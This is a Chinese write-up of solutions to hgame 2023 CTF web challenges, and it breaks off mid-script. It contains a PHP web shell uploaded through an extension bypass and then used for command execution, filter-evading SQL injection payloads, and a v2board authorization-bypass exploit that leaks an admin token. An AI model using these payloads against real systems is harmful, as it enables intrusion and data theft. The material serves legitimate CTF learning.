hgame 2023 web题解

Week1

Classic Childhood Game

http://week-1.hgame.lwsec.cn:30603/Res/Events.js

var a = ['\x59\x55\x64\x6b\x61\x47\x4a\x58\x56\x6a\x64\x61\x62\x46\x5a\x31\x59\x6d\x35\x73\x53\x31\x6c\x59\x57\x6d\x68\x6a\x4d\x6b\x35\x35\x59\x56\x68\x43\x4d\x45\x70\x72\x57\x6a\x46\x69\x62\x54\x55\x31\x56\x46\x52\x43\x4d\x46\x6c\x56\x59\x7a\x42\x69\x56\x31\x59\x35'];

运行得到

[ 'YUdkaGJXVjdabFZ1Ym5sS1lYWmhjMk55YVhCMEprWjFibTU1VFRCMFlVYzBiV1Y5' ]

base64解码两次即可得到

hgame{fUnnyJavascript&FunnyM0taG4me}

Become A Member

一步步来就行

GET / HTTP/1.1
Host: week-1.hgame.lwsec.cn:32132
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Cute-Bunny
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=MTY3MjkzMTY3NXxEdi1CQkFFQ180SUFBUkFCRUFBQU9fLUNBQUlHYzNSeWFXNW5EQWdBQm5OdmJIWmxaQU5wYm5RRUFnQUVCbk4wY21sdVp3d05BQXRqYUdGc2JHVnVaMlZKWkFOcGJuUUVBZ0ItfEpkrqBezOGq9RBd9KmLkzyDgKVjXFwrAT9nHfmQOxAS; PHPSESSID=jpl68kvmg4r5ivdebfb84sa9k1; code=Vidar
Referer: bunnybunnybunny.com
X-Forwarded-For: 127.0.0.1
Connection: close
Content-Length: 55


{
"username":"luckytoday",
"password":"happy123"
}

得到flag

hgame{H0w_ArE_Y0u_T0day?}

Guess Who I Am

源码提示https://github.com/Potat0000/Vidar-Website/edit/master/src/scripts/config/member.js

database.json

[{
    "id": "ba1van4",
    "intro": "21级 / 不会Re / 不会美工 / 活在梦里 / 喜欢做不会的事情 / ◼◻粉",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=kSt5er0OQMXROy28nzTia0A&s=640",
    "url": "https://ba1van4.icu"
}, {
    "id": "yolande",
    "intro": "21级 / 非常菜的密码手 / 很懒的摸鱼爱好者，有点呆，想学点别的但是一直开摆",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=rY328VIqDc7lNtujYic8JxA&s=640",
    "url": "https://y01and3.github.io/"
}, {
    "id": "t0hka",
    "intro": "21级 / 日常自闭的Re手",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EYNwm1PQe8o5OcghFb4zfw&s=640",
    "url": "https://blog.t0hka.top/"
}, {
    "id": "h4kuy4",
    "intro": "21级 / 菜鸡pwn手 / 又菜又爱摆",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=BmACniaibVb6IL6LiaYF4Uvlw&s=640",
    "url": "https://hakuya.work"
}, {
    "id": "kabuto",
    "intro": "21级web / cat../../../../f*",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=oPn2ez6Nq12GqPZG6cV7nw&s=640",
    "url": "https://www.bilibili.com/video/BV1GJ411x7h7/"
}, {
    "id": "R1esbyfe",
    "intro": "21级 / 爱好歪脖 / 究极咸鱼一条 / 热爱幻想 / 喜欢窥屏水群",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=FLyUHP6nYov19gA0ia83u8Q&s=640",
    "url": "https://r1esbyfe.top/"
}, {
    "id": "tr0uble",
    "intro": "21级 / 喜欢肝原神的密码手",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=bgcib3gBjJGdKEf7BZ512Uw&s=640",
    "url": "https://clingm.top"
}, {
    "id": "Roam",
    "intro": "21级 / 入门级crypto",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=5wzr9TVyw2nxOz5Jb7ceaQ&s=640",
    "url": "#"
}, {
    "id": "Potat0",
    "intro": "20级 / 摆烂网管 / DN42爱好者",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=NicTy1CDqeHsgzbZEIUU2wg&s=640",
    "url": "https://potat0.cc/"
}, {
    "id": "Summer",
    "intro": "20级 / 歪脖手 / 想学运维 / 发呆业务爱好者",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=4y6zxTBSB3cbseeyPvQWng&s=640",
    "url": "https://blog.m1dsummer.top"
}, {
    "id": "chuj",
    "intro": "20级 / 已退休不再参与大多数赛事 / 不好好学习，生活中就会多出许多魔法和奇迹",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=aM4tJSQSxB5gcauIMDEtUg&s=640",
    "url": "https://cjovi.icu"
}, {
    "id": "4nsw3r",
    "intro": "20级会长 / re / 不会pwn",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=j3LOiav9IluKSYg1VEibblZw&s=640",
    "url": "https://4nsw3r.top/"
}, {
    "id": "4ctue",
    "intro": "20级 / 可能是IOT的MISC手 / 可能是美工 / 废物晚期",
    "avatar": "../../images/avatar/4ctue.jpg",
    "url": "#"
}, {
    "id": "0wl",
    "intro": "20级 / Re手 / 菜",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=06FRYslcuprt59OxibicdhqQ&s=640",
    "url": "https://0wl-alt.github.io"
}, {
    "id": "At0m",
    "intro": "20级 / web / 想学iot",
    "avatar": "../../images/avatar/at0m.png",
    "url": "https://homeboyc.cn/"
}, {
    "id": "ChenMoFeiJin",
    "intro": "20级 / Crypto / 摸鱼学代师",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=5xyCaLib3lovjrUzf5pWxDQ&s=640",
    "url": "https://chenmofeijin.top"
}, {
    "id": "Klrin",
    "intro": "20级 / WEB / 菜的抠脚 / 想学GO",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=nnzEWNwxMS88jKYre5fOjg&s=640",
    "url": "https://blog.mjclouds.com/"
}, {
    "id": "ek1ng",
    "intro": "20级 / Web / 还在努力",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=pJFuHEqNaFk1If1STvRibWw&s=640",
    "url": "https://ek1ng.com"
}, {
    "id": "latt1ce",
    "intro": "20级 / Crypto&BlockChain / Plz V me 50 eth",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EmPiaz7Msgg7iaia9tibibjdUyw&s=640",
    "url": "https://lee-tc.github.io/"
}, {
    "id": "Ac4ae0",
    "intro": "*级 / 被拐卖来接盘的格子 / 不可以乱涂乱画哦",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EI7A02PYs5WUVFP2bciad8w&s=640",
    "url": "https://twitter.com/LAttic1ng"
}, {
    "id": "Akira",
    "intro": "19级 / 不会web / 半吊子运维 / 今天您漏油了吗",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=ku1vqyI1hLJr61PGIlic7Ow&s=640",
    "url": "https://4kr.top"
}, {
    "id": "qz",
    "intro": "19级 / 摸鱼美工 / 学习图形学、渲染ing",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=q5qVDcvyzxee4qiays52mibA&s=640",
    "url": "https://fl0.top/"
}, {
    "id": "Liki4",
    "intro": "19级 / 脖子笔直歪脖手",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=E3j3BJrsAfyl1arfnFKufQ&s=640",
    "url": "https://github.com/Liki4"
}, {
    "id": "0x4qE",
    "intro": "19级 / </p><p>Web",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=K7icYial1VVzlNl7hrD9MlNw&s=640",
    "url": "https://github.com/0x4qE"
}, {
    "id": "xi4oyu",
    "intro": "19级 / 骨瘦如柴的胖手",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=JfeMY6Lz5ZU4GmtTV85otQ&s=640",
    "url": "https://www.xi4oyu.top/"
}, {
    "id": "R3n0",
    "intro": "19级 / bin底层选手",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=icY08gnMlXtoYIJ9ib3eJQ2g&s=640",
    "url": "https://r3n0.top"
}, {
    "id": "m140",
    "intro": "19级 / 不会re / dl萌新 / 太弱小了，没有力量 / 想学游戏",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=zt0iccbnGuV8dOpXIYrJgvg&s=640",
    "url": "#"
}, {
    "id": "Mezone",
    "intro": "19级 / 普通的binary爱好者。",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=rDD29iahzzg8AvQX7fdbFPg&s=640",
    "url": "#"
}, {
    "id": "d1gg12",
    "intro": "19级 / 游戏开发 / 🐟粉",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=icawQKtjLcRiaj7scTRBZ9Qw&s=640",
    "url": "https://d1g.club"
}, {
    "id": "Trotsky",
    "intro": "19级 / 半个全栈 / 安卓摸🐟 / P 社玩家 / 🍆粉",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=LiasEshjTXTrNzJjPHVY3Vw&s=640",
    "url": "https://altonhe.github.io/"
}, {
    "id": "Gamison",
    "intro": "19级 / 挖坑不填的web选手",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=0VaAu2go9mvrMXu1ibmKy1g&s=640",
    "url": "http://aw.gamison.top"
}, {
    "id": "Tinmix",
    "intro": "19级会长 / DL爱好者 / web苦手",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=L2EclrAltb7lk3LBPY6oWA&s=640",
    "url": "http://poi.ac"
}, {
    "id": "RT",
    "intro": "19级 / Re手，我手呢？",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=p1TD1qwKfEK8NZExRDqic1A&s=640",
    "url": "https://wr-web.github.io"
}, {
    "id": "wenzhuan",
    "intro": "18 级 / 完全不会安全 / 一个做设计的鸽子美工 / 天天画表情包",
    "avatar": "../../images/avatar/wenzhuan.jpg",
    "url": "https://wzyxv1n.top/"
}, {
    "id": "Cosmos",
    "intro": "18级 / 莫得灵魂的开发 / 茄粉 / 作豚 /  米厨",
    "avatar": "../../images/avatar/cosmos.jpg",
    "url": "https://cosmos.red"
}, {
    "id": "Y",
    "intro": "18 级 / Bin / Win / 电竞缺乏视力 / 开发太菜 / 只会 C / CSGO 白给选手",
    "avatar": "../../images/avatar/Y.jpg",
    "url": "https://blog.xyzz.ml:444/"
}, {
    "id": "Annevi",
    "intro": "18级 / 会点开发的退休web手 / 想学挖洞 / 混吃等死",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=WN9x96MpjSJ3Gc7a3SHtDw&s=640",
    "url": "https://annevi.cn"
}, {
    "id": "logong",
    "intro": "18 级 / 求大佬带我IoT入门 / web太难了只能做做misc维持生计 / 摸🐟",
    "avatar": "../../images/avatar/logong.jpg",
    "url": "http://logong.vip"
}, {
    "id": "Kevin",
    "intro": "18 级 / Web / 车万",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=jaXAqywDMbia39e4OfGXicPQ&s=640",
    "url": "https://harmless.blue/"
}, {
    "id": "LurkNoi",
    "intro": "18级 / 会一丢丢crypto / 摸鱼",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=CLTlN5QPS3aI60icIoxGmdQ&s=640",
    "url": "#"
}, {
    "id": "幼稚园",
    "intro": "18级会长 / 二进制安全 /  干拉",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=G2o7mX9RCTkiaCHeEiaJLBwA&s=640",
    "url": "https://danisjiang.com"
}, {
    "id": "lostflower",
    "intro": "18级 / 游戏引擎开发 / 尚有梦想的game maker",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=eQHtN69C2tgM8Ul8PmtTKw&s=640",
    "url": "https://r000setta.github.io"
}, {
    "id": "Roc826",
    "intro": "18 级 / Web 底层选手",
    "avatar": "../../images/avatar/Roc826.jpg",
    "url": "http://www.roc826.cn/"
}, {
    "id": "Seadom",
    "intro": "18 级 / Web / 真·菜到超乎想象 / 拼死学（mo）习（yu）中",
    "avatar": "../../images/avatar/seadom.png",
    "url": "#"
}, {
    "id": "ObjectNotFound",
    "intro": "18级 / 懂点Web & Misc / 懂点运维 / 正在懂游戏引擎 / 我们联合！",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=yQnkF86Uy6UkZrZmFYLL4g&s=640",
    "url": "https://www.zhouweitong.site"
}, {
    "id": "Moesang",
    "intro": "18 级 / 不擅长 Web / 擅长摸鱼 / 摸鱼！",
    "avatar": "../../images/avatar/Moesang.png",
    "url": "https://blog.wz22.cc"
}, {
    "id": "E99p1ant",
    "intro": "18级 / 囊地鼠饲养员 / 写了一个叫 Cardinal 的平台",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=AJQ9RJRCavhSibMZtRq2JOQ&s=640",
    "url": "https://github.red/"
}, {
    "id": "Michael",
    "intro": "18 级 / Java / 会除我佬",
    "avatar": "../../images/avatar/Michael.jpg",
    "url": "http://michaelsblog.top/"
}, {
    "id": "matrixtang",
    "intro": "18级 / 编译器工程师( 伪 / 半吊子PL- 静态分析方向",
    "avatar": "../../images/avatar/MATRIX.jpg",
    "url": "#"
}, {
    "id": "r4u",
    "intro": "18级 / 不可以摸🐠哦",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=rJCqQv1EzicpDW77nMa5bYw&s=640",
    "url": "http://r4u.top/"
}, {
    "id": "357",
    "intro": "18级 / 并不会web / 端茶送水选手",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=POaV9Y85NiaUcibaETEKTpfw&s=640",
    "url": "#"
}, {
    "id": "Li4n0",
    "intro": "17 级 / Web 安全爱好者 / 半个程序员 / 没有女朋友",
    "avatar": "../../images/avatar/li4no.jpg",
    "url": "https://blog.0e1.top"
}, {
    "id": "迟原静",
    "intro": "17级 / Focus on Java Security",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=xyVPFvQ2dWReoBiahd7naSw&s=640",
    "url": "#"
}, {
    "id": "Ch1p",
    "intro": "17 级 / 自称 Bin 手实际啥都不会 / 二次元安全",
    "avatar": "../../images/avatar/Chip.jpg",
    "url": "http://ch1p.top"
}, {
    "id": "f1rry",
    "intro": "17 级 / Web",
    "avatar": "../../images/avatar/f1rry.png",
    "url": "#"
}, {
    "id": "mian",
    "intro": "17 级 / 业余开发 / 专业摸鱼",
    "avatar": "../../images/avatar/mian.jpg",
    "url": "https://www.intmian.com"
}, {
    "id": "ACce1er4t0r",
    "intro": "17级 / 摸鱼ctfer / 依旧在尝试入门bin / 菜鸡研究生+1",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=gRBlwiawx1lF4UkPKh4Liczg&s=640",
    "url": "#"
}, {
    "id": "MiGo",
    "intro": "17级 / 二战人 / 老二次元 / 兴趣驱动生活",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=XzZggL7hDeicLXb2FSic6sfg&s=640",
    "url": "https://migoooo.github.io/"
}, {
    "id": "BrownFly",
    "intro": "17级 / RedTeamer / 字节跳动安全工程师",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=EnNslsFelj9HibuKoNHwmyg&s=640",
    "url": "https://brownfly.github.io"
}, {
    "id": "Aris",
    "intro": "17级/ Key厨 / 腾讯玄武倒水的",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=anjeaJmx1X79Yp1DNxWrRA&s=640",
    "url": "https://blog.ar1s.top"
}, {
    "id": "hsiaoxychen",
    "intro": "17级 / 游戏厂打工仔 / 来深圳找我快活",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=YGiaicyZ3NkWfOoGOlLPWvAw&s=640",
    "url": "https://chenxy.me"
}, {
    "id": "Lou00",
    "intro": "17级 / web / 东南读研",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=fdAMuUicvOObMv3eZC8y0Ew&s=640",
    "url": "https://blog.lou00.top"
}, {
    "id": "Junier",
    "intro": "16 级 / 立志学术的统计er / R / 为楼上的脱单事业做出了贡献",
    "avatar": "../../images/avatar/Junier.jpg",
    "url": "#"
}, {
    "id": "bigmud",
    "intro": "16 级会长 / Web 后端 / 会一点点 Web 安全 / 会一丢丢二进制",
    "avatar": "../../images/avatar/bigmud.jpg",
    "url": "#"
}, {
    "id": "NeverMoes",
    "intro": "16 级 / Java 福娃 / 上班 996 / 下班 669",
    "avatar": "../../images/avatar/nervermoes.jpg",
    "url": "#"
}, {
    "id": "Sora",
    "intro": "16 级 / Web Developer",
    "avatar": "../../images/avatar/Sora.jpg",
    "url": "https://github.com/Last-Order"
}, {
    "id": "fantasyqt",
    "intro": "16 级 / 可能会运维 / 摸鱼选手",
    "avatar": "../../images/avatar/fantasyqt.jpg",
    "url": "http://0x2f.xyz"
}, {
    "id": "vvv_347",
    "intro": "16 级 / Rev / Windows / Freelancer",
    "avatar": "../../images/avatar/vvv_347.png",
    "url": "https://vvv-347.space"
}, {
    "id": "veritas501",
    "intro": "16 级 / Bin / 被迫研狗",
    "avatar": "../../images/avatar/veritas501.jpeg",
    "url": "https://veritas501.space"
}, {
    "id": "LuckyCat",
    "intro": "16 级 / Web 🐱 / 现于长亭科技实习",
    "avatar": "../../images/avatar/princessprincepal.jpg",
    "url": "https://jianshu.com/u/ad5c1e097b84"
}, {
    "id": "Ash",
    "intro": "16 级 / Java 开发攻城狮 / 996 选手 / 濒临猝死",
    "avatar": "../../images/avatar/ash.jpg",
    "url": "#"
}, {
    "id": "Cyris",
    "intro": "16 级 / Web 前端 / 美工 / 阿里云搬砖",
    "avatar": "https://cdn.jsdelivr.net/npm/cyris/images/avatar.png",
    "url": "https://cyris.moe/"
}, {
    "id": "Acaleph",
    "intro": "16 级 / Web 前端 / 水母一小只 / 程序员鼓励师 / Cy 来组饥荒！",
    "avatar": "../../images/avatar/Acaleph.jpg",
    "url": "#"
}, {
    "id": "b0lv42",
    "intro": "16级 / 大果子 / 毕业1年仍在寻找vidar娘接盘侠",
    "avatar": "../../images/avatar/b0lv42.jpg",
    "url": "https://b0lv42.github.io/"
}, {
    "id": "ngc7293",
    "intro": "16 级 / 蟒蛇饲养员 / 高数小王子",
    "avatar": "../../images/avatar/ngc7293.jpg",
    "url": "https://ngc7292.github.io/"
}, {
    "id": "ckj123",
    "intro": "16 级 / Web / 菜鸡第一人",
    "avatar": "../../images/avatar/ckj123.jpg",
    "url": "https://www.ckj123.com"
}, {
    "id": "cru5h",
    "intro": "16级 / 前web手、现pwn手 / 菜鸡研究生 / scu",
    "avatar": "https://thirdqq.qlogo.cn/g?b=sdk&k=5kpiaPnLZ1cWrp0G8O4qHDg&s=640",
    "url": "#"
}, {
    "id": "xiaoyao52110",
    "intro": "16 级 / Bin 打杂 / 他们说菜都是假的，我是真的",
    "avatar": "../../images/avatar/xiaoyao52110.jpg",
    "url": "#"
}, {
    "id": "Undefinedv",
    "intro": "15 级网安协会会长 / Web 安全",
    "avatar": "../../images/avatar/undefinedv.jpg",
    "url": "#"
}, {
    "id": "Spine",
    "intro": "逆向 / 二进制安全",
    "avatar": "../../images/avatar/spine.jpg",
    "url": "#"
}, {
    "id": "Tata",
    "intro": "二进制 CGC 入门水准 / 半吊子爬虫与反爬虫",
    "avatar": "../../images/avatar/tata.jpg",
    "url": "#"
}, {
    "id": "Airbasic",
    "intro": "Web 安全 / 长亭科技安服部门 / TSRC 2015 年年度英雄榜第八、2016 年年度英雄榜第十三",
    "avatar": "../../images/avatar/airbasic.jpg",
    "url": "#"
}, {
    "id": "jibo",
    "intro": "15 级 / 什么都不会的开发 / 打什么都菜",
    "avatar": "../../images/avatar/jibo.jpg",
    "url": "#"
}, {
    "id": "Processor",
    "intro": "15 级 Vidar 会长 / 送分型逆向选手 / 13 段剑纯 / 差点没毕业 / 阿斯巴甜有点甜",
    "avatar": "../../images/avatar/Processor.jpeg",
    "url": "https://processor.pub/"
}, {
    "id": "HeartSky",
    "intro": "15 级 / 挖不到洞 / 打不动 CTF / 内网渗透不了 / 工具写不出",
    "avatar": "../../images/avatar/heartsky.jpg",
    "url": "http://heartsky.info"
}, {
    "id": "Minygd",
    "intro": "15 级 / 删库跑路熟练工 / 没事儿拍个照 / 企鹅",
    "avatar": "../../images/avatar/mingy.jpg",
    "url": "#"
}, {
    "id": "Yotubird",
    "intro": "15 级 / 已入 Python 神教",
    "avatar": "../../images/avatar/Yotubird.png",
    "url": "#"
}, {
    "id": "c014",
    "intro": "15 级 / Web 🐶 / 汪汪汪",
    "avatar": "../../images/avatar/c014.png",
    "url": "#"
}, {
    "id": "Explorer",
    "intro": "14 级 HDUISA 会长 / 二进制安全 / 曾被 NULL、TD、蓝莲花等拉去凑人数 / 差点没毕业 / 长亭安研",
    "avatar": "../../images/avatar/Explorer.jpg",
    "url": "#"
}, {
    "id": "Aklis",
    "intro": "14 级 HDUISA 副会长 / 二次元 / 拼多多安全工程师",
    "avatar": "../../images/avatar/aklis.jpg",
    "url": "#"
}, {
    "id": "Sysorem",
    "intro": "14 级网安协会会长 / HDUISA 成员 / Web 安全 / Freebuf 安全社区特约作者 / FSI2015Freebuf 特邀嘉宾",
    "avatar": "../../images/avatar/sysorem.jpg",
    "url": "#"
}, {
    "id": "Hcamael",
    "intro": "13 级 / 知道创宇 404 安全研究员 / 现在 Nu1L 划划水 / IoT、Web、二进制漏洞，密码学，区块链都看得懂一点，但啥也不会",
    "avatar": "../../images/avatar/hcamael.jpg",
    "url": "#"
}, {
    "id": "LoRexxar",
    "intro": "14 级 / Web 🐶 / 杭电江流儿 / 自走棋主教守门员",
    "avatar": "../../images/avatar/lorexxar.jpg",
    "url": "https://lorexxar.cn/"
}, {
    "id": "A1ex",
    "intro": "14 级网安协会副会长 / Web 安全",
    "avatar": "../../images/avatar/alex.jpg",
    "url": "#"
}, {
    "id": "Ahlaman",
    "intro": "14 级网安协会副会长 / 无线安全",
    "avatar": "../../images/avatar/ahlaman.jpg",
    "url": "#"
}, {
    "id": "lightless",
    "intro": "Web 安全 / 安全工程师 / 半吊子开发 / 半吊子安全研究",
    "avatar": "../../images/avatar/lightless.jpg",
    "url": "https://lightless.me/"
}, {
    "id": "Edward_L",
    "intro": "13 级 HDUISA 会长 / Web 安全 / 华为安全部门 / 二进制安全，fuzz，符号执行方向研究",
    "avatar": "../../images/avatar/edward_L.jpg",
    "url": "#"
}, {
    "id": "逆风",
    "intro": "13 级菜鸡 / 大数据打杂",
    "avatar": "../../images/avatar/deadwind4.jpeg",
    "url": "https://github.com/deadwind4"
}, {
    "id": "陈斩仙",
    "intro": "什么都不会 / 咸鱼研究生 / <del>安恒</del>、<del>长亭</del> / SJTU",
    "avatar": "../../images/avatar/chenzhanxian.jpg",
    "url": "https://mxgcccc4.github.io/"
}, {
    "id": "Eric",
    "intro": "渗透 / 人工智能 / 北师大博士在读",
    "avatar": "../../images/avatar/eric.jpg",
    "url": "https://3riccc.github.io"
}]

exp.py

import requests
import re
import json

with open("./database.json",'r',encoding='utf-8') as load_f:
    load_dict = json.load(load_f)

session = requests.session()
while True:
    
    question_url = 'http://week-1.hgame.lwsec.cn:30466/api/getQuestion'
    verify_url = 'http://week-1.hgame.lwsec.cn:30466/api/verifyAnswer'
    getscore_url = 'http://week-1.hgame.lwsec.cn:30466/api/getScore'
    data = {
        'id': ''
    }
    response_q = session.get(url=question_url)
    res = re.findall('".*?"',response_q.text)[1]
    for info in load_dict:
        if(info['intro']==res[1:-1]):
            print(info['id'])
            data = {
                'id': info['id']
            }
    
    response = session.post(url=verify_url,data=data)
    print(response.text)
    if 'Correct' not in response.text:
        print(response_q.text)
        break
    response = session.get(url=getscore_url)
    print(response.text)

    if '100' in response.text:
        break
    # break

成功跑完即可得到flag

hgame{Guess_who_i_am^Happy_Crawler}

Show Me Your Beauty

用Php后缀绕过

POST /upload.php HTTP/1.1
Host: week-1.hgame.lwsec.cn:32057
Content-Length: 205
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhpSA34RZsdEhzob1
Origin: http://week-1.hgame.lwsec.cn:32057
Referer: http://week-1.hgame.lwsec.cn:32057/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=MTY3MjkzMTY3NXxEdi1CQkFFQ180SUFBUkFCRUFBQU9fLUNBQUlHYzNSeWFXNW5EQWdBQm5OdmJIWmxaQU5wYm5RRUFnQUVCbk4wY21sdVp3d05BQXRqYUdGc2JHVnVaMlZKWkFOcGJuUUVBZ0ItfEpkrqBezOGq9RBd9KmLkzyDgKVjXFwrAT9nHfmQOxAS; PHPSESSID=jpl68kvmg4r5ivdebfb84sa9k1
Connection: close

------WebKitFormBoundaryhpSA34RZsdEhzob1
Content-Disposition: form-data; name="file"; filename="a.Php"
Content-Type: image/jpeg

<?php @eval($_GET['a']);?>
------WebKitFormBoundaryhpSA34RZsdEhzob1--

执行命令即可

GET /img/a.Php?a=system("cat+/flag"); HTTP/1.1
Host: week-1.hgame.lwsec.cn:32057
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=MTY3MjkzMTY3NXxEdi1CQkFFQ180SUFBUkFCRUFBQU9fLUNBQUlHYzNSeWFXNW5EQWdBQm5OdmJIWmxaQU5wYm5RRUFnQUVCbk4wY21sdVp3d05BQXRqYUdGc2JHVnVaMlZKWkFOcGJuUUVBZ0ItfEpkrqBezOGq9RBd9KmLkzyDgKVjXFwrAT9nHfmQOxAS; PHPSESSID=jpl68kvmg4r5ivdebfb84sa9k1
Connection: close

得到flag

hgame{Unsave_F1L5_SYS7em_UPL0ad!}

Week2

Git Leakage

使用GitHack扫描/.git/页面即可下载Th1s_1s-flag文件

hgame{Don't^put*Git-in_web_directory}

v2board

v2board v.1.6.1 机场面板管理接口越权漏洞

分析可参考该博文

利用工具https://github.com/zgao264/v2board-exp

在_api_v1_admin_user_fetch.json中找到admin的token

{"id":1,"invite_user_id":null,"telegram_id":null,"email":"admin@example.com","password":"$2y$10$JLs3LJrKqsTly8K.w9KzI.e0Jt\/7oU9W3gQYcUDSRjg1LReimLLTS","password_algo":null,"password_salt":null,"balance":0,"discount":null,"commission_type":0,"commission_rate":null,"commission_balance":0,"t":0,"u":0,"d":0,"transfer_enable":0,"banned":0,"is_admin":1,"is_staff":0,"last_login_at":null,"last_login_ip":null,"uuid":"85a1c66e-d736-42b2-a0da-69f6fb066e90","group_id":1,"plan_id":1,"remind_expire":1,"remind_traffic":1,"token":"39d580e71705f6abac9a414def74c466","remarks":null,"expired_at":0,"created_at":1673263308,"updated_at":1673267067,"total_used":0,"plan_name":"Vidar-Team Plane\ud83d\udee9","subscribe_url":"http:\/\/week-2.hgame.lwsec.cn:31624\/api\/v1\/client\/subscribe?token=39d580e71705f6abac9a414def74c466"}],"total":4}

包裹上hgame即可

hgame{39d580e71705f6abac9a414def74c466}

Search Commodity

爆破得到密码

username：user01
password：admin123

登陆进去

search_id=1
hard disk 1

测试了下发现ban了一些字符

select and or union 空格 /**/ database =

但是大写可以绕过，因此可以直接注出来

# 显示2 3
search_id=(-1)Union/*a*/SelEct/*a*/1,2,3
# se4rch 3
search_id=(-1)UNION/*A*/SELECT/*A*/1,DATABASE(),3
# 5ecret15here,L1st,user1nf0 3 (这里注意information里面有个or)
search_id=(-1)UNION/*A*/SELECT/*A*/1,(SELECT/*A*/GROUP_CONCAT(TABLE_NAME)FROM/*A*/INFORMATION_SCHEMA.TABLES/*A*/WHERE/*A*/TABLE_SCHEMA/*A*/LIKE/*A*/DATABASE()),3
# f14gggg1shere 3
search_id=(-1)UNION/*A*/SELECT/*A*/1,(SELECT/*A*/GROUP_CONCAT(COLUMN_NAME)FROM/*A*/INFORMATION_SCHEMA.COLUMNS/*A*/WHERE/*A*/TABLE_NAME/*A*/LIKE/*A*/"5ecret15here"),3
# hgame{4_M4n_WH0_Kn0ws_We4k-P4ssW0rd_And_SQL!} 3
search_id=(-1)UNION/*A*/SELECT/*A*/1,(SELECT/*A*/GROUP_CONCAT(f14gggg1shere)/*A*/FROM/*A*/5ecret15here),3

也可以写脚本盲注（我写的很暴力）

#encoding: utf-8
import requests
import re
import os

url = 'http://week-2.hgame.lwsec.cn:32118/search'

headers = {
	'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Cache-Control': 'max-age=0',
    'Connection': 'keep-alive',
    'Content-Length': '11',
    'Content-Type': 'application/x-www-form-urlencoded',
